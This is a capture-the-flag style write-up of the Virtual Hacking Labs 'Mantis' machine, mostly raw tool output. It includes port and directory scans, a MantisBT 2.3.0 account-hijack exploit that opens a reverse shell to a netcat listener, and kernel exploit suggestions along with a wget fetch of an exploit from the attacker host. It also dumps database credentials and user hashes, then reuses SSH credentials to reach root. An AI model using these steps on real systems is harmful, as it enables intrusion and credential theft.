WriteupsVHL — Mantis
MiscMediumLinux
VHL — Mantis
MantisBT bug tracker with Samba shares on Ubuntu. Enumeration of SMB reveals credentials reused for MantisBT admin access.
February 12, 2025Virtual Hacking Labs
#MantisBT#Samba#SMB#Credential Reuse
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 21:44 EST
Nmap scan report for 10.11.1.74
Host is up (0.023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:20:85:0d:42:d0:88:8d:57:8f:0c:7b:fe:12:ff:8c (RSA)
| 256 1f:e5:0b:97:32:7d:07:f5:de:f7:34:7d:0d:e0:ba:c6 (ECDSA)
|_ 256 25:7b:9b:15:86:7e:4a:19:04:bc:4f:58:79:9d:55:87 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.8-Ubuntu (workgroup: WORKGROUP)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.8-Ubuntu)
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: \x00
| FQDN: mantis
|_ System time: 2025-02-12T21:44:33-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 3s
|_nbstat: NetBIOS name: MANTIS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2025-02-13T02:44:33
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 22.66 ms 10.11.1.74
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.83 seconds80
sh
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)directory search
sh
dirsearch -u http://10.11.1.74/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/vhl/Mantis/reports/http_10.11.1.74/__25-02-12_21-46-39.txt
Target: http://10.11.1.74/
[21:46:39] Starting:
[21:46:41] 403 - 296B - /.ht_wsr.txt
[21:46:41] 403 - 299B - /.htaccess.orig
[21:46:41] 403 - 299B - /.htaccess_orig
[21:46:41] 403 - 297B - /.htaccess_sc
[21:46:41] 403 - 301B - /.htaccess.sample
[21:46:41] 403 - 290B - /.html
[21:46:41] 403 - 299B - /.htaccess.bak1
[21:46:41] 403 - 299B - /.htaccess.save
[21:46:41] 403 - 297B - /.htaccessOLD
[21:46:41] 403 - 298B - /.htaccessOLD2
[21:46:41] 403 - 295B - /.htpasswds
[21:46:41] 403 - 296B - /.httr-oauth
[21:46:41] 403 - 297B - /.htaccessBAK
[21:46:41] 403 - 299B - /.htpasswd_test
[21:46:41] 403 - 289B - /.htm
[21:46:41] 403 - 300B - /.htaccess_extra
[21:46:42] 403 - 289B - /.php
[21:46:42] 403 - 290B - /.php3
[21:47:12] 200 - 39B - /robots.txt
[21:47:13] 403 - 299B - /server-status/
[21:47:13] 403 - 298B - /server-statusrobots.txt
-
/mantisbt-2.3.0
-
modify the code
sh
python2 mantis2.3.0.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned upsh
nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.74] 52790
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mantis:/var/www/html/mantisbt-2.3.0$ whoami
whoami
www-data445
sh
445/tcp open netbios-ssn Samba smbd 4.3.8-Ubuntu (workgroup: WORKGROUP)sh
smbclient -N -L \\\\10.11.1.74
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (mantis server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
privilege escalation
sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16sh
╔══════════╣ Searching passwords in config PHP files
$g_db_password = 'root';
* "Driver={SQL Server Native Client 10.0};SERVER=.\sqlexpress;DATABASE=bugtracker;UID=mantis;PWD=password;"
$g_ldap_bind_passwd = '';
$g_lost_password_feature = ON;
$g_max_lost_password_in_progress_count = 3;
$g_send_reset_password = ON;linux exploit suggester
sh
www-data@mantis:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working- https://www.exploit-db.com/exploits/47170
- didnt work
sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc chocobo_root.c -o chocobo_root -lpthreadsh
www-data@mantis:/tmp$ wget http://172.16.1.1/chocobo_root- didnt work
sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -pthread 40839.c -o 40839 -lcryptconfig_inc.php
sh
www-data@mantis:/var/www/html/mantisbt-2.3.0/config$ cat config_inc.php
cat config_inc.php
<?php
$g_hostname = 'localhost';
$g_db_type = 'mysqli';
$g_database_name = 'bugtracker';
$g_db_username = 'root';
$g_db_password = 'root';
$g_default_timezone = 'America/New_York';
$g_crypto_master_salt = 'nrz+LyGkJes7wOZafUINT+bxC8wxkjiLIFnpHB4a08k=';
sh
www-data@mantis:/var/www/html/mantisbt-2.3.0/config$ mysql -u 'root' -p'root'sh
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bugtracker |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.02 sec)
mysql> use bugtrackersh
mysql> show tables;
show tables;
+-----------------------------------+
| Tables_in_bugtracker |
+-----------------------------------+
| mantis_api_token_table |
| mantis_bug_file_table |
| mantis_bug_history_table |
| mantis_bug_monitor_table |
| mantis_bug_relationship_table |
| mantis_bug_revision_table |
| mantis_bug_table |
| mantis_bug_tag_table |
| mantis_bug_text_table |
| mantis_bugnote_table |
| mantis_bugnote_text_table |
| mantis_category_table |
| mantis_config_table |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table |
| mantis_custom_field_table |
| mantis_email_table |
| mantis_filters_table |
| mantis_news_table |
| mantis_plugin_table |
| mantis_project_file_table |
| mantis_project_hierarchy_table |
| mantis_project_table |
| mantis_project_user_list_table |
| mantis_project_version_table |
| mantis_sponsorship_table |
| mantis_tag_table |
| mantis_tokens_table |
| mantis_user_pref_table |
| mantis_user_print_pref_table |
| mantis_user_profile_table |
| mantis_user_table |
+-----------------------------------+
32 rows in set (0.00 sec)sh
mysql> select * from mantis_user_table;
select * from mantis_user_table;
+----+---------------+---------------+-------------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
| id | username | realname | email | password | enabled | protected | access_level | login_count | lost_password_request_count | failed_login_count | cookie_string | last_visit | date_created |
+----+---------------+---------------+-------------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
| 1 | administrator | administrator | root@localhost | 5f4dcc3b... | 1 | 0 | 90 | 8 | 0 | 0 | A_24heg-JSiw-tu-XOsVfiuq8EVC8Xzswaj_aj4iCkLYHExLMjeBVXauZ0LXdRLq | 1739415357 | 1495104271 |
| 2 | John | John | john@mantis.local | 95d3a628... | 1 | 0 | 25 | 0 | 0 | 0 | tRd4wbzjStPFglx0ElJkTPqWMICfASeoYM2oGgo1uTzv0PKzIo94k_46lhyAPMBf | 1495104497 | 1495104497 |
| 3 | Sara | Sara | Sara@mantis.local | ab41dc45... | 1 | 0 | 25 | 0 | 0 | 0 | 8haTH18cfURa4QE3KBuO3XBgAKwXYjTlVjxHpt2OkoL95OGh_ZtIW-w6LJArgpR1 | 1495104515 | 1495104515 |
| 4 | test | | test@email.com | 3a69171d... | 1 | 0 | 25 | 0 | 0 | 1 | KmN7oF6wF9wrIzYXC4noU9NJehNzSisr__SCKFj1LTWHlu07KpFobWrdg4EuiHCA | 1739414985 | 1739414985 |
+----+---------------+---------------+-------------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
4 rows in set (0.00 sec)
login to portal
- since the script payload modified admin password can login see if there's any information
creds
sh
SSH: mantis/mantis4testingssh as mantis
sh
ssh mantis@10.11.1.74
The authenticity of host '10.11.1.74 (10.11.1.74)' can't be established.
ED25519 key fingerprint is SHA256:J3Ic06jcYeWSypWwYXuxWQ7z/7OVl85d14i5/F94MH4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.11.1.74' (ED25519) to the list of known hosts.
mantis@10.11.1.74's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic i686)
* Documentation: https://help.ubuntu.com/
213 packages can be updated.
124 updates are security updates.
Last login: Thu May 18 06:53:18 2017 from 172.16.1.1
mantis@mantis:~$ whoami
mantissudo
sh
mantis@mantis:~$ sudo -l
[sudo] password for mantis:
Matching Defaults entries for mantis on mantis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mantis may run the following commands on mantis:
(ALL : ALL) ALL
mantis@mantis:~$ sudo su
root@mantis:/home/mantis# whoami
rootsh
mantis@mantis:~$ sudo -l
[sudo] password for mantis:
Matching Defaults entries for mantis on mantis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mantis may run the following commands on mantis:
(ALL : ALL) ALL
mantis@mantis:~$ sudo su
root@mantis:/home/mantis# whoami
root
root@mantis:/home/mantis# cat /root/key.txt
8fv6wznh6efx966okspg
root@mantis:/home/mantis# date
Wed Feb 12 22:33:08 EST 2025
Up next
EasyFeb 2025
VHL — Natural
FTP anonymous login exposes web application files. Abused file write via FTP to upload a PHP webshell for initial access.
Read writeup
EasyFeb 2025
VHL — Trails
Hiking Trails web application on Ubuntu. Directory traversal and file inclusion vulnerabilities lead to credentials and shell.
Read writeup
EasyFeb 2025
VHL — Anthony
Windows 7 SP1 with Apache and multiple services. Enumerated web application vulnerabilities and exploited weak credentials for admin access.
Read writeup